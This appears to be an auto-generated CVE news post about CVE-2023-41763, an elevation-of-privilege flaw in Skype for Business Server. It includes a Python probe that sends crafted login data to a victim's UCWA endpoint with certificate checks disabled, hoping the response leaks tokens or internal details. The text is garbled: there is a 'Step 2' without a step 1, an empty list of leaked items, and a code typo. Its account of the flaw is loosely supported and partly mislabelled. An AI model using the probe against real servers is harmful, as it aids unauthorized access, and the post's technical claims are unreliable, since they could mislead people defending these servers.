CVE CyberSecurity Database News

CVE-2023-41763 - Exploiting Skype for Business Elevation of Privilege Vulnerability

Poster -

In October 2023, Microsoft patched a critical vulnerability—CVE-2023-41763—affecting Skype for Business. Labeled as an Elevation of Privilege (EoP), this flaw could let an attacker gain sensitive information or even execute commands with higher privileges on affected systems. In this post, let’s break down what the vulnerability is, how it can be exploited, and see code examples and references for deeper analysis.

What is CVE-2023-41763?

CVE-2023-41763 targets Skype for Business Server (various versions up to 2019 CU9). The vulnerability stems from improper handling of user input sent to the Unified Messaging (UCWA) API endpoint. If exploited, an attacker can escalate privileges or gain unauthorized access to information.

Microsoft’s Advisory:
Microsoft Security Update Guide - CVE-2023-41763

How Does the Vulnerability Work?

The flaw allows an attacker, who can send HTTP requests to the Skype for Business UCWA endpoint, to access sensitive data due to improper authentication and validation. In the worst case, this helps attackers gather enough info to launch further attacks, assuming the role of a legitimate user.

UCWA API endpoints generally look like

https://<skype-server>/Ucwa/OAuthtoken

Or sometimes

https://<skype-server>/ucwa/oauth/v1/applications

Step 2: Send a Malicious Request

Below is a sample Python script that demonstrates how an attacker might try to exploit this vulnerability by sending a crafted HTTP request.

import requests

url = "https://victim-skype-server/ucwa/oauth/v1/applications";
headers = {
    "Accept": "application/json",
    "Content-Type": "application/json"
}

# The body may try to mimic a legitimate authentication or session request
payload = {
    "grant_type": "password",
    "username": "target_user",
    "password": "invalid_password"
}

response = requests.post(url, json=payload, headers=headers, verify=False)
print(response.status_code)
print(response.text)  # This may leak sensitive error information or tokens

Danger: Using invalid but specially crafted login details, the attacker observes the server’s response. Vulnerable servers may leak details such as internal URIs, usernames, or even authentication tokens.

Real-World Impact

An attacker with access to the corporate network can automate probes against Skype for Business servers. If the server is vulnerable, it might leak:

References

- Microsoft Security Guidance for CVE-2023-41763
- NVD - CVE-2023-41763
- Microsoft Security Blog - October 2023 updates
- UCWA documentation

Conclusion

CVE-2023-41763 is a significant vulnerability that highlights the importance of securing collaboration software like Skype for Business. Attackers can leverage seemingly harmless endpoints to escalate privileges or steal data. Protect your network by patching promptly and monitoring traffic to sensitive endpoints.

If you manage Skype for Business servers, take action now—your organization’s security depends on it.

Timeline

Published on: 10/10/2023 18:15:18 UTC
Last modified on: 10/12/2023 22:18:56 UTC